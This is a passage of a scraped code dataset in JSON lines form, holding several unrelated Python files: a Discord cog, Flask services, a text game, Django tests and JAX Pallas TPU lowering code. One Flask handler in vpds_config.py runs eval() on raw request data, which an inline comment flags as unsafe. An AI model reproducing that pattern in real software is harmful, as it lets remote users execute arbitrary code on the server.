inventory items.\ndef get_current_stock(inventory):\n    sumOfStock = 0\n    sumOfValue = 0\n\n    for oneDict in inventory:\n        sumOfStock += int(oneDict[\"NUMBER\"])\n        sumOfValue += float(oneDict[\"VALUE\"] * oneDict[\"NUMBER\"])\n\n    return (sumOfStock,sumOfValue)\n\n\n\ndef save_to_file(inventory):\n    with open('inventory.inv', 'w') as file:\n        json.dump(inventory, file)\n        file.close()\n\ndef load_from_file():\n    with open('inventory.inv', 'r') as file:\n        inventory = json.load(file)\n    return inventory\n","sub_path":"calculation.py","file_name":"calculation.py","file_ext":"py","file_size_in_byte":4463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"450157253","text":"import discord\nfrom discord.ext import commands\n\n\nclass General:\n\n    def __init__(self, bot):\n        self.bot = bot\n\n    @commands.command()\n    async def ping(self):\n        await self.bot.say(\"Pong!\")\n\n\ndef setup(bot):\n    print(dir(General))\n    bot.add_cog(General(bot))\n\n","sub_path":"cogs/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"55373822","text":"from e_database import vpds_config as vpds_config_db\r\nfrom flask import jsonify\r\n\r\ndef search_vpds_config(request):\r\n    res = vpds_config_db.search_vpds_config()\r\n    \r\n    return jsonify(results = res)\r\n\r\ndef update_vpds_config(request):\r\n    req_dict = eval(request.data.decode('utf8'))  # note: eval() on a request payload is unsafe; json.loads would be safer\r\n    model_type = req_dict['model_type']\r\n    if model_type == '1':\r\n        vp_data_slice_type = req_dict['vp_data_slice_type']\r\n        vpds_config_db.update_vpds_config('vp_data_slice_type', vp_data_slice_type)\r\n        \r\n        cnn_training_target = req_dict['cnn_training_target']\r\n        vpds_config_db.update_vpds_config('cnn_training_target', cnn_training_target)\r\n        \r\n        vp_data_training_num = req_dict['vp_data_training_num']\r\n        vpds_config_db.update_vpds_config('vp_data_training_num', vp_data_training_num)\r\n        \r\n        normal_data_training_num = req_dict['normal_data_training_num']\r\n        vpds_config_db.update_vpds_config('normal_data_training_num', normal_data_training_num)\r\n    elif model_type == '2':\r\n        jw_selected_data = req_dict['jw_selected_data']\r\n        
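# NOTE: every key below follows the same read-then-persist pattern; an\r\n        # equivalent loop would be:\r\n        #   for key in ('jw_selected_data', 'jw_vp_experiment_group_no', ...):\r\n        #       vpds_config_db.update_vpds_config(key, req_dict[key])\r\n        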
vpds_config_db.update_vpds_config('jw_selected_data', jw_selected_data)\r\n \r\n jw_vp_experiment_group_no = req_dict['jw_vp_experiment_group_no']\r\n vpds_config_db.update_vpds_config('jw_vp_experiment_group_no', jw_vp_experiment_group_no)\r\n \r\n jw_normal_experiment_group_no = req_dict['jw_normal_experiment_group_no']\r\n vpds_config_db.update_vpds_config('jw_normal_experiment_group_no', jw_normal_experiment_group_no)\r\n \r\n jw_experiment_report_data_length = req_dict['jw_experiment_report_data_length']\r\n vpds_config_db.update_vpds_config('jw_experiment_report_data_length', jw_experiment_report_data_length)\r\n \r\n min_vp_voca_same_rate = req_dict['min_vp_voca_same_rate']\r\n vpds_config_db.update_vpds_config('min_vp_voca_same_rate', min_vp_voca_same_rate)\r\n \r\n vp_threshold = req_dict['vp_threshold']\r\n vpds_config_db.update_vpds_config('vp_threshold', vp_threshold)\r\n \r\n less_threshold_decrease_point = req_dict['less_threshold_decrease_point']\r\n vpds_config_db.update_vpds_config('less_threshold_decrease_point', less_threshold_decrease_point)\r\n elif model_type == '3':\r\n doc2vec_selected_data = req_dict['doc2vec_selected_data']\r\n vpds_config_db.update_vpds_config('doc2vec_selected_data', doc2vec_selected_data)\r\n \r\n doc2vec_vp_experiment_group_no = req_dict['doc2vec_vp_experiment_group_no']\r\n vpds_config_db.update_vpds_config('doc2vec_vp_experiment_group_no', doc2vec_vp_experiment_group_no)\r\n \r\n doc2vec_normal_experiment_group_no = req_dict['doc2vec_normal_experiment_group_no']\r\n vpds_config_db.update_vpds_config('doc2vec_normal_experiment_group_no', doc2vec_normal_experiment_group_no)\r\n \r\n doc2vec_training_data_length = req_dict['doc2vec_training_data_length']\r\n vpds_config_db.update_vpds_config('doc2vec_training_data_length', doc2vec_training_data_length)\r\n \r\n doc2vec_experiment_report_data_length = req_dict['doc2vec_experiment_report_data_length']\r\n vpds_config_db.update_vpds_config('doc2vec_experiment_report_data_length', doc2vec_experiment_report_data_length)\r\n \r\n return jsonify('')\r\n","sub_path":"d_service/vpds_config.py","file_name":"vpds_config.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"76675764","text":"from pprint import pprint\nimport random\n\ncurrent_activities = ', or teleport'\n\nclass Activity:\n def __init__(self):\n self.current_activities = ', heal, or teleport'\n self.current_location_text = ''\n\n def basic_crafting(self, inventory, conv_factor, item_to_craft):\n\n num_to_craft = int(input('How many? 
').lower().strip())\n\n        raw_material = inventory.crafting[item_to_craft]\n\n        if item_to_craft not in inventory.player_inventory['items']['itemsids']:\n            if inventory.player_inventory[raw_material] >= conv_factor * num_to_craft:\n                inventory.player_inventory[raw_material] -= conv_factor * num_to_craft\n                inventory.player_inventory[item_to_craft] += num_to_craft\n            else:\n                print('Not enough resources!')\n        elif item_to_craft in inventory.player_inventory['items']['itemsids']:\n            if inventory.player_inventory['items'][raw_material] >= conv_factor * num_to_craft:\n                inventory.player_inventory['items'][raw_material] -= conv_factor * num_to_craft\n                inventory.player_inventory['items'][item_to_craft] += num_to_craft\n\n    def advanced_crafting(self, raw_materialA, raw_materialB, raw_materialC, raw_materialD, raw_materialE, costA, costB, costC,\n                          costD, costE, item_to_craft, inventory):\n        if inventory.player_inventory[raw_materialA] >= costA and \\\n                inventory.player_inventory[raw_materialB] >= costB and \\\n                inventory.player_inventory[raw_materialC] >= costC and \\\n                inventory.player_inventory[raw_materialD] >= costD and \\\n                inventory.player_inventory[raw_materialE] >= costE:\n\n            inventory.player_inventory[raw_materialA] -= costA\n            inventory.player_inventory[raw_materialB] -= costB\n            inventory.player_inventory[raw_materialC] -= costC\n            inventory.player_inventory[raw_materialD] -= costD\n            inventory.player_inventory[raw_materialE] -= costE\n            inventory.player_inventory[item_to_craft] = True\n        else:\n            print('Not enough resources')\n\n    def battle(self, enemy, enemy_name, attackA, attackB, lootA, ammo, inventory):\n        battle_loop = True\n        self.health_storage = enemy['health']\n        while battle_loop == True:\n            print('You have encountered a ' + str(enemy_name))\n            print('Your health is at: ' + str(inventory.player_inventory['health']))\n            print('What do you do?')\n            print('Fight')\n            print('Run')\n            print('Item')\n            command = input().lower().strip()\n            if command == 'fight':\n                percent_hit = random.randint(1, 20)\n                
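# d20-style to-hit roll: the attack lands unless the roll falls in the\n                # enemy's armor list; ranged attacks additionally miss on 19 or 20.\n                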
if inventory.weapon['type'] == 'melee':\n                    if percent_hit not in enemy['armor']:\n                        enemy['health'] -= inventory.weapon['damage']\n                        print('You attack!')\n                elif inventory.weapon['type'] == 'ranged':\n                    if ammo > 0:\n                        if percent_hit not in enemy['armor'] + [19, 20]:\n                            enemy['health'] -= inventory.weapon['damage']\n                            print('You attack!')\n                        ammo -= 1\n                    else:\n                        print('No ammo!')\n                enemy_attack = random.randint(1, 20)\n                if enemy_attack in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]:\n                    inventory.player_inventory['health'] -= enemy[attackA]\n                    print('Enemy attacks!')\n                elif attackB != 'none' and enemy_attack in [11, 12, 13, 14, 15]:\n                    inventory.player_inventory['health'] -= enemy[attackB]\n                    print('Enemy attacks!')\n                elif attackB == 'none' and enemy_attack in [11, 12, 13, 14, 15]:\n                    inventory.player_inventory['health'] -= enemy[attackA]\n                    print('Enemy attacks!')\n                if inventory.player_inventory['health'] <= 0:\n                    break\n                if enemy['health'] <= 0:\n                    print('You defeated ' + str(enemy_name))\n                    inventory.player_inventory['EXP'] += enemy['EXP']\n                    print('You have ' + str(inventory.player_inventory['EXP']) + ' EXP!')\n                    if lootA != 'none':\n                        inventory.player_inventory[lootA] += 1\n                    battle_loop = False\n            elif command == 'run':\n                run_chance = random.randint(1, 2)\n                if run_chance == 1:\n                    battle_loop = False\n                    print('Got away safely!')\n                else:\n                    print('Can\\'t escape!')\n                    enemy_attack = random.randint(1, 3)\n                    if enemy_attack == 1:\n                        inventory.player_inventory['health'] -= enemy[attackA]\n                    else:\n                        inventory.player_inventory['health'] -= enemy[attackB]\n                        if inventory.player_inventory['health'] <= 0:\n                            break\n                elif command == 'item':\n                    print('Which item would you like to use?')\n                    print(inventory.player_inventory['items'])\n                    command = input().lower().strip()\n                    if command == 'mushroom' and inventory.player_inventory['mushrooms'] > 0:\n                        inventory.player_inventory['health'] += 1\n                        inventory.player_inventory['mushrooms'] -= 1\n                else:\n                    print('I don\\'t understand')\n            else:\n                print('I don\\'t understand')\n        enemy['health'] = self.health_storage\n\n    def region_check(self, location):\n        if location.regions[location.current_location]['type'] == 'plains':\n            self.current_activities = ', teleport, move, or mine calcium carbonate'\n            self.current_location_text = 'in a big open plains'\n        elif location.regions[location.current_location]['type'] == 'swamp':\n            self.current_activities = ', teleport, move, or mine carbon'\n            self.current_location_text = 'in a marshy swamp'\n        elif location.regions[location.current_location]['type'] == 'mountain':\n            self.current_activities = ', teleport, move, or mine calcium carbonate'\n            self.current_location_text = 'on a steep mountain'\n        elif location.regions[location.current_location]['type'] == 'forest':\n            self.current_activities = ', teleport, move, or mine carbon'\n            self.current_location_text = 'in a deep forest'\n\n    def teleport(self, location, regions_list):\n        if location.current_location == 'space_ship':\n            location.current_location = location.regions['c3']['id']\n        elif location.current_location in regions_list:\n            location.current_location = 'space_ship'\n        if location.current_location == 'space_ship':\n            self.current_location_text = 'in your spaceship'\n            self.current_activities = ', heal, or teleport'\n        else:\n            self.region_check(location)\n\n    def main_loop(self, location, inventory, enemies):\n        if location.current_location == 'space_ship':\n            self.current_location_text = 'in your spaceship'\n        else:\n            self.region_check(location)\n        options = 'You may check inventory' + self.current_activities\n        print('You are ' + self.current_location_text)\n        print(options)\n        self.command = input('What would you like to do? 
').lower().strip()\n        if self.command == 'check inventory':\n            print(inventory.player_inventory)\n        elif self.command == 'teleport':\n            self.teleport(location, location.regions_list)\n        elif self.command == 'north':\n            if 'north' in location.regions[location.current_location]:\n                location.current_location = location.regions[location.current_location]['north']\n            else:\n                print('Can\\'t go that way!')\n        elif self.command == 'east':\n            if 'east' in location.regions[location.current_location]:\n                location.current_location = location.regions[location.current_location]['east']\n            else:\n                print('Can\\'t go that way!')\n        elif self.command == 'south':\n            if 'south' in location.regions[location.current_location]:\n                location.current_location = location.regions[location.current_location]['south']\n            else:\n                print('Can\\'t go that way!')\n        elif self.command == 'west':\n            if 'west' in location.regions[location.current_location]:\n                location.current_location = location.regions[location.current_location]['west']\n            else:\n                print('Can\\'t go that way!')\n        elif self.command == 'mine calcium carbonate':\n            if location.regions[location.current_location]['type'] in ['plains', 'mountain']:\n                battle_odds = random.randint(1, 2)\n                if battle_odds == 1:\n                    self.battle(enemies.enemies['slime'], 'slime', 'tackle', 'none', 'gel',\n                                inventory.weapon['ammo'], inventory)\n                inventory.player_inventory['calcium_carbonate'] += 10\n                print('You have ' + str(inventory.player_inventory['calcium_carbonate']) + ' calcium carbonate')\n        elif self.command == 'mine carbon':\n            if location.regions[location.current_location]['type'] in ['swamp', 'forest']:\n                battle_odds = random.randint(1, 2)\n                if battle_odds == 1:\n                    self.battle(enemies.enemies['slime'], 'slime', 'tackle', 'none', 'gel',\n                                inventory.weapon['ammo'], inventory)\n                inventory.player_inventory['carbon'] += 10\n                print('You have ' + str(inventory.player_inventory['carbon']) + ' carbon')\n        else:\n            print('I don\\'t understand that command')\n\n\n\n","sub_path":"activity.py","file_name":"activity.py","file_ext":"py","file_size_in_byte":10057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"524255052","text":"from flask import Flask, request, jsonify, make_response\nfrom bs4 import BeautifulSoup\nimport requests\n\napp = Flask(__name__)\n\n@app.route('/historyToday', methods=['GET'])\ndef historyToday():\n\tsoup = BeautifulSoup(requests.get(\"http://www.todayonhistory.com/\").content, 'html.parser', from_encoding='utf-8')\n\tresult = []\n\timgDiv = soup.find_all('div', 'pic')\n\t
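# The site appears to lazy-load its images, so the real URL sits in the\n\t# 'data-original' attribute rather than 'src'; relative paths get the host prepended below.\n\t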
for index, iD in enumerate(imgDiv):\n\t\tif iD.a and iD.a.img:\n\t\t\ttemp = iD.a.img\n\t\t\tsrc = temp['data-original']\n\t\t\tif src[0] == '/':\n\t\t\t\tsrc = 'http://www.todayonhistory.com' + src\n\t\t\tresult.append({'src': src, 'year': iD.find_previous_sibling().span.b.text, 'title': temp['alt']})\n\n\tresponse = make_response(jsonify({'result': result}))\n\t# Set CORS headers to allow cross-origin requests\n\tresponse.headers['Access-Control-Allow-Origin'] = '*'\n\tresponse.headers['Access-Control-Allow-Methods'] = 'POST'\n\tresponse.headers['Access-Control-Allow-Headers'] = 'x-requested-with,content-type'\n\treturn response\napp.run()","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"483355533","text":"from django.test import TestCase\nfrom django.test.client import Client\nfrom django.contrib.auth.models import User\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core.files import File\n\nfrom attachments.models import Attachment, TestModel\n\nimport os\nfrom tempfile import NamedTemporaryFile\n\n\"\"\"\n\n>>> from attachments.models import Attachment, TestModel\n>>> from django.contrib.auth.models import User\n>>> from django.contrib.contenttypes.models import ContentType\n\n>>> import os\n>>> TEST_DIR = os.path.join(os.path.dirname(__file__))\n>>> TEST_FILE1 = os.path.join(TEST_DIR, \"models.py\")\n>>> TEST_FILE2 = os.path.join(TEST_DIR, \"views.py\")\n\n>>> bob = User(username=\"bob\")\n>>> bob\n<User: bob>\n>>> bob.save()\n\n>>> tm = TestModel(name=\"Test1\")\n>>> tm.name\n'Test1'\n>>> tm.save()\n\n\n>>> att1 = Attachment.objects.create_for_object(\n...     tm, file=TEST_FILE1, attached_by=bob, title=\"Something\",\n...     summary=\"Something more\")\n>>> att1\n<Attachment: Something>\n\n\n>>> att2 = Attachment.objects.create_for_object(\n...     tm, file=TEST_FILE2, attached_by=bob, title=\"Something Else\",\n...     summary=\"Something else more\")\n>>> att2\n<Attachment: Something Else>\n\n>>> Attachment.objects.attachments_for_object(tm)\n[<Attachment: Something>, <Attachment: Something Else>]\n\"\"\"\n\nclass TestAttachmentCopying(TestCase):\n    def setUp(self):\n        self.client = Client(REMOTE_ADDR='localhost')\n        self.bob = User(username=\"bob\")\n        self.bob.save()\n\n        self.tm = TestModel(name=\"Test1\")\n        self.tm.save()\n        self.tm2 = TestModel(name=\"Test2\")\n        self.tm2.save()\n\n        self.test_file1 = NamedTemporaryFile('w+')\n        self.test_file1.write(\"some test text\")\n        self.test_file1.flush()\n        self.test_file1.seek(0)\n\n        self.test_file2 = NamedTemporaryFile('w+')\n        self.test_file2.write(\"some test text\")\n        self.test_file2.flush()\n        self.test_file2.seek(0)\n\n    def testDeepCopying(self):\n        \"\"\"\n        Test that doing a deep copy of a file actually attempts to create a\n        second version of a file.\n        \"\"\"\n        att1 = Attachment.objects.create_for_object(\n            self.tm, file=self.test_file1, attached_by=self.bob,\n            title=\"Something\", summary=\"Something\")\n        f = File(self.test_file1)\n        att1.file.save('models.py', f)\n\n        att2 = att1.copy(self.tm2, deepcopy=True)\n\n        # Ensure the saved_copy uses its proper file path\n        attachments = Attachment.objects.attachments_for_object(self.tm2)\n        for attachment in attachments:\n            self.assertEqual(\n                attachment.file.name,\n                Attachment.get_attachment_dir(attachment,\n                    attachment.file_name())\n            )","sub_path":"attachments/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"154900173","text":"# Copyright 2023 The JAX Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Module for lowering JAX to Mosaic-compatible MLIR dialects.\"\"\"\nfrom __future__ import annotations\n\nimport dataclasses\nimport functools\nfrom typing import Any, Callable, Sequence\n\nfrom jax import core as jax_core\nfrom jax import lax\nfrom jax import tree_util\nfrom jax._src import custom_derivatives\nfrom jax._src import debugging\nfrom jax._src import linear_util as lu\nfrom jax._src import pjit\nfrom 
jax._src import source_info_util\nfrom jax._src import state\nfrom jax._src.interpreters import mlir\nfrom jax._src.interpreters import partial_eval as pe\nfrom jax._src.lax.control_flow import for_loop\nfrom jax._src.lib.mlir import ir\nfrom jax._src.lib.mlir.dialects import arith\nfrom jax._src.lib.mlir.dialects import func\nfrom jax._src.lib.mlir.dialects import math\nfrom jax._src.lib.mlir.dialects import memref\nfrom jax._src.lib.mlir.dialects import scf\nfrom jax._src.lib.mlir.dialects import vector\nfrom jax._src.pallas import core\nfrom jax._src.pallas import indexing\nfrom jax._src.pallas import primitives\nfrom jax._src.pallas import utils as pallas_utils\nfrom jax._src.pallas.mosaic import core as tpu_core\nfrom jax._src.pallas.mosaic import primitives as tpu_primitives\nfrom jax._src.state import discharge as state_discharge\nfrom jax._src.state import primitives as state_primitives\nfrom jax._src.util import safe_map\nfrom jax._src.util import safe_zip\nfrom jax._src.util import split_list\nfrom jax._src.util import unzip2\nfrom jax.experimental.mosaic.dialects import tpu\nimport jax.numpy as jnp\nimport numpy as np\n\n# TODO(sharadmv): enable type checking\n# mypy: ignore-errors\n\nNDIndexer = indexing.NDIndexer\nTPUMemorySpace = tpu_core.TPUMemorySpace\nVMEM = tpu_core.TPUMemorySpace.VMEM\nSMEM = tpu_core.TPUMemorySpace.SMEM\n\npartial = functools.partial\nmap, unsafe_map = safe_map, map # pylint: disable=redefined-builtin\nzip, unsafe_zip = safe_zip, zip # pylint: disable=redefined-builtin\n\n\n@dataclasses.dataclass\nclass LoweringContext:\n ir_context: ir.Context\n grid_mapping: core.GridMapping | None\n grid_indices: Sequence[ir.Value] | None\n block_shapes: list[tuple[int | core.Mapped, ...]]\n name_stack: source_info_util.NameStack\n replace = dataclasses.replace\n\n\n@dataclasses.dataclass\nclass LoweringRuleContext:\n lowering_context: LoweringContext\n avals_in: Sequence[jax_core.AbstractValue]\n avals_out: Sequence[jax_core.AbstractValue]\n block_shapes: list[tuple[int | core.Mapped, ...]] | None\n\n replace = dataclasses.replace\n\n\ndef _memory_space_to_tpu_memspace(memory_space: TPUMemorySpace | None\n ) -> ir.Attribute:\n if memory_space is None:\n memory_space = VMEM\n return ir.Attribute.parse(f\"#tpu.memory_space<{memory_space}>\")\n\n\ndef aval_to_ir_type(aval, shape=None, memory_space: TPUMemorySpace | None = None):\n if shape is None:\n shape = aval.shape\n if isinstance(aval, state.AbstractRef):\n memspace = _memory_space_to_tpu_memspace(memory_space)\n return ir.MemRefType.get(shape, mlir.dtype_to_ir_type(aval.dtype),\n memory_space=memspace)\n elif isinstance(aval, jax_core.ShapedArray):\n if shape == ():\n return mlir.dtype_to_ir_type(aval.dtype)\n return ir.VectorType.get(shape, mlir.dtype_to_ir_type(aval.dtype))\n raise NotImplementedError(aval)\n\n\ndef ir_constant(x, mlir_type=None):\n if not hasattr(x, \"dtype\"):\n if isinstance(x, int):\n x = np.array(x, np.int32)\n elif isinstance(x, float):\n x = np.array(x, np.float32)\n if not mlir_type:\n mlir_type = mlir.dtype_to_ir_type(x.dtype)\n if isinstance(x, int) or x.dtype == np.int32 or x.dtype == np.uint32:\n return arith.ConstantOp(mlir_type, ir.IntegerAttr.get(mlir_type, int(x))\n ).result\n elif isinstance(x, float) or x.dtype == np.float32:\n return arith.ConstantOp(\n mlir_type, ir.FloatAttr.get(mlir_type, float(x))\n ).result\n elif x.dtype == jnp.bfloat16:\n return arith.ConstantOp(\n mlir_type, ir.FloatAttr.get(mlir_type, float(x))\n ).result\n elif x.dtype == jnp.bool_:\n return 
arith.ConstantOp(\n        mlir_type, ir.BoolAttr.get(bool(x))\n    ).result\n  raise NotImplementedError(x.dtype)\n\n\nlowering_rules = {}\n\n\ndef lower_jaxpr_to_module(\n    ctx: ir.Context,\n    grid_mapping: core.GridMapping,\n    jaxpr: jax_core.Jaxpr,\n    dimension_semantics: tuple[str | None, ...] | None,\n    memory_spaces: tuple[TPUMemorySpace | None, ...] | None\n) -> ir.Module:\n  m = ir.Module.create()\n  sym_tab = ir.SymbolTable(m.operation)\n  if all(bm is None for bm in grid_mapping.block_mappings):\n    # Trivial grid-map, we don't need to populate the transform functions.\n    func_op = lower_jaxpr_to_func(ctx, jaxpr, grid_mapping=grid_mapping,\n                                  memory_spaces=memory_spaces,\n                                  name=\"main\")\n    m.body.append(func_op)\n    sym_tab.insert(func_op)\n    return m\n  func_op = lower_jaxpr_to_func(ctx, jaxpr, grid_mapping=grid_mapping,\n                                memory_spaces=memory_spaces,\n                                name=\"main\")\n  m.body.append(func_op)\n  sym_tab.insert(func_op)\n  num_smem_inputs = grid_mapping.num_index_operands\n  window_params = []\n  grid = grid_mapping.grid\n  for i, bm in enumerate(grid_mapping.block_mappings):\n    func_name = f\"transform_{i}\"\n    if bm.index_map_jaxpr.consts:\n      raise NotImplementedError(\"Index map jaxpr with consts not supported.\")\n    mlir_func = lower_jaxpr_to_transform_func(\n        ctx,\n        bm.index_map_jaxpr.jaxpr,\n        [*[None] * len(grid), *[SMEM] * num_smem_inputs],\n        name=func_name)\n    assert mlir_func.verify(), mlir_func\n    block_shape = [\n        1 if b is core.mapped else b for b in bm.block_shape\n    ]\n    window_shape = ir.DenseI64ArrayAttr.get(block_shape)\n    window_params.append(\n        ir.DictAttr.get(\n            dict(\n                window_bounds=window_shape,\n                transform_indices=ir.FlatSymbolRefAttr.get(func_name),\n            )\n        )\n    )\n    m.body.append(mlir_func)\n    sym_tab.insert(mlir_func)\n  func_op.attributes[\"scalar_prefetch\"] = ir.IntegerAttr.get(\n      ir.IntegerType.get_signless(64), num_smem_inputs)\n  func_op.attributes[\"window_params\"] = ir.ArrayAttr.get(window_params)\n  func_op.attributes[\"iteration_bounds\"] = ir.DenseI64ArrayAttr.get(\n      grid_mapping.grid\n  )\n\n  def _get_semantics(s: str | None) -> str:\n    if s is None:\n      return \"#tpu.dimension_semantics<arbitrary>\"\n    return f\"#tpu.dimension_semantics<{s}>\"\n\n  if dimension_semantics is None:\n    func_dimension_semantics = [\n        _get_semantics(\"parallel\")\n        if i in grid_mapping.mapped_dims\n        else _get_semantics(None)\n        for i, d in enumerate(grid_mapping.grid)\n    ]\n  else:\n    dimension_semantics_iter = iter(dimension_semantics)\n    func_dimension_semantics = [\n        _get_semantics(\"parallel\")\n        if i in grid_mapping.mapped_dims\n        else _get_semantics(next(dimension_semantics_iter))\n        for i, d in enumerate(grid_mapping.grid)\n    ]\n  func_op.attributes[\"dimension_semantics\"] = ir.ArrayAttr.get(\n      map(ir.Attribute.parse, func_dimension_semantics)\n  )\n  return m\n\n\ndef lower_jaxpr_to_transform_func(\n    ctx: ir.Context, jaxpr: jax_core.Jaxpr, memspaces: Sequence[Any],\n    *, name: str) -> func.FuncOp:\n  block_shapes = [i.aval.shape for i in jaxpr.invars]\n  arg_types = [*map(aval_to_ir_type, [invar.aval for invar in jaxpr.invars],\n                    block_shapes, memspaces)]\n  lowering_context = LoweringContext(\n      ctx, None, None, block_shapes, source_info_util.NameStack())\n  body_func = functools.partial(jaxpr_subcomp, lowering_context, jaxpr)\n  body_func.__name__ = name\n  body = func.FuncOp.from_py_func(*arg_types, name=name)(body_func)\n  body.func_op.verify()\n  return body.func_op\n\ndef lower_fun(fun: Callable, *, multiple_results: bool) -> Callable:\n  def f_lowered(ctx: LoweringRuleContext, *args, **params):\n    f = fun if multiple_results else 
lambda *args, **kw: (fun(*args, **kw),)\n wrapped_fun = lu.wrap_init(f, params)\n jaxpr, _, consts = pe.trace_to_jaxpr_dynamic(wrapped_fun, ctx.avals_in)\n if consts:\n raise NotImplementedError\n jaxpr = pe.convert_constvars_jaxpr(jaxpr)\n lowering_context = ctx.lowering_context.replace(\n block_shapes=ctx.block_shapes)\n out = jaxpr_subcomp(lowering_context, jaxpr, *consts, *args)\n if not multiple_results:\n return out[0]\n return out\n\n return f_lowered\n\n\ndef lower_jaxpr_to_func(\n ctx: ir.Context,\n jaxpr: jax_core.Jaxpr,\n *,\n memory_spaces: Sequence[tpu_core.TPUMemorySpace | None] | None,\n grid_mapping: core.GridMapping | None,\n name: str,\n) -> func.FuncOp:\n if grid_mapping:\n arg_types = map(\n aval_to_ir_type,\n [jax_core.ShapedArray((), jnp.int32) for _ in grid_mapping.grid],\n )\n else:\n arg_types = []\n\n def _get_arg_type(aval, block_mapping: core.BlockMapping | None,\n memory_space: tpu_core.TPUMemorySpace | None):\n if block_mapping is None:\n return aval_to_ir_type(aval, memory_space=memory_space), aval.shape\n shape = tuple(\n 1 if b is core.mapped else b for b in block_mapping.block_shape\n )\n return (aval_to_ir_type(aval, shape=shape, memory_space=memory_space),\n block_mapping.block_shape)\n if memory_spaces is None:\n memory_spaces = [None] * len(jaxpr.invars)\n if len(memory_spaces) != len(jaxpr.invars):\n raise ValueError(\"Must have as many memory spaces as inputs and outputs.\")\n if grid_mapping is None:\n block_mappings = [None] * len(jaxpr.invars)\n else:\n scalar_prefetch = grid_mapping.num_index_operands\n block_mappings = grid_mapping.block_mappings\n block_mappings = [*[None] * scalar_prefetch, *block_mappings]\n for memory_space in memory_spaces[:scalar_prefetch]:\n if memory_space is not None and memory_space != SMEM:\n raise ValueError(\"Cannot specify non-SMEM memory space for \"\n \"scalar prefetch inputs.\")\n memory_spaces = memory_spaces[scalar_prefetch:]\n memory_spaces = [*[SMEM] * scalar_prefetch, *memory_spaces]\n invar_arg_types, block_shapes = unzip2(\n map(_get_arg_type, [invar.aval for invar in jaxpr.invars], block_mappings,\n memory_spaces)\n )\n arg_types = [*arg_types, *invar_arg_types]\n if grid_mapping:\n\n def body_func(*args):\n grid_indices, args = split_list(args, [len(grid_mapping.grid)])\n grid_indices = [\n g\n for i, g in enumerate(grid_indices)\n if i not in grid_mapping.mapped_dims\n ]\n lowering_context = LoweringContext(\n ctx,\n grid_mapping,\n tuple(grid_indices),\n block_shapes,\n source_info_util.NameStack(),\n )\n return jaxpr_subcomp(lowering_context, jaxpr, *args)\n\n else:\n lowering_context = LoweringContext(\n ctx, None, None, block_shapes, source_info_util.NameStack()\n )\n body_func = functools.partial(jaxpr_subcomp, lowering_context, jaxpr)\n body_func.__name__ = name\n body = func.FuncOp.from_py_func(*arg_types, name=name)(body_func)\n body.func_op.verify()\n return body.func_op\n\n\ndef jaxpr_subcomp(\n ctx: LoweringContext, jaxpr: jax_core.Jaxpr, *args: ir.Value\n) -> Sequence[ir.Value]:\n assert not jaxpr.constvars\n env = {}\n block_shape_env = {}\n\n def read_block_shape(atom: jax_core.Atom):\n if isinstance(atom, jax_core.Literal):\n return None\n return block_shape_env.get(atom, None)\n\n def read_env(atom: jax_core.Atom):\n return atom.val if isinstance(atom, jax_core.Literal) else env[atom]\n\n def write_env(var: jax_core.Var, val):\n assert isinstance(val, ir.Value), type(val)\n env[var] = val\n\n for invar, bs in zip(jaxpr.invars, ctx.block_shapes):\n block_shape_env[invar] = bs\n 
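# The map below seeds env with the MLIR value for each jaxpr input; the\n  # equation loop that follows reads operands out of env via read_env and\n  # stores results back with write_env.\n  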
map(write_env, jaxpr.invars, args)\n\n for eqn in jaxpr.eqns:\n invals = map(read_env, eqn.invars)\n source_info = eqn.source_info.replace(\n name_stack=ctx.name_stack + eqn.source_info.name_stack\n )\n loc = mlir._source_info_to_location(\n eqn.primitive, eqn.params, source_info, ctx.name_stack\n )\n with source_info_util.user_context(eqn.source_info.traceback), loc:\n if eqn.primitive in lowering_rules:\n block_shapes = map(read_block_shape, eqn.invars)\n rule_context = LoweringRuleContext(\n ctx,\n [v.aval for v in eqn.invars],\n [v.aval for v in eqn.outvars],\n block_shapes,\n )\n ans = lowering_rules[eqn.primitive](rule_context, *invals, **eqn.params)\n else:\n raise NotImplementedError(\n \"Unimplemented primitive in Pallas TPU lowering: \"\n f\"{eqn.primitive.name}. \"\n \"Please file an issue on https://github.com/google/jax/issues.\")\n if eqn.primitive.multiple_results:\n map(write_env, eqn.outvars, ans)\n else:\n write_env(eqn.outvars[0], ans)\n outvals = map(read_env, jaxpr.outvars)\n outvals = [\n ir_constant(x) if isinstance(var, jax_core.Literal) else x\n for x, var in zip(outvals, jaxpr.outvars)\n ]\n return outvals\n\n\ndef _convert_flat_indexing_to_indexer(ref_aval, non_slice_idx,\n non_slice_idx_avals, indexed_dims):\n non_slice_idx_iter = iter(zip(non_slice_idx, non_slice_idx_avals))\n splatted_idx_idx_avals = tuple(\n next(non_slice_idx_iter)\n if indexed\n else (primitives.Slice(0, s), primitives.Slice(0, s))\n for s, indexed in zip(ref_aval.shape,indexed_dims)\n )\n splatted_idx, splatted_idx_avals = unzip2(splatted_idx_idx_avals)\n if non_slice_idx:\n (int_indexer_shape,) = set([idx_aval.shape for idx_aval\n in splatted_idx_avals\n if not isinstance(idx_aval, primitives.Slice)])\n else:\n int_indexer_shape = ()\n nd_indexer = NDIndexer(splatted_idx, ref_aval.shape, int_indexer_shape)\n nd_indexer_avals = 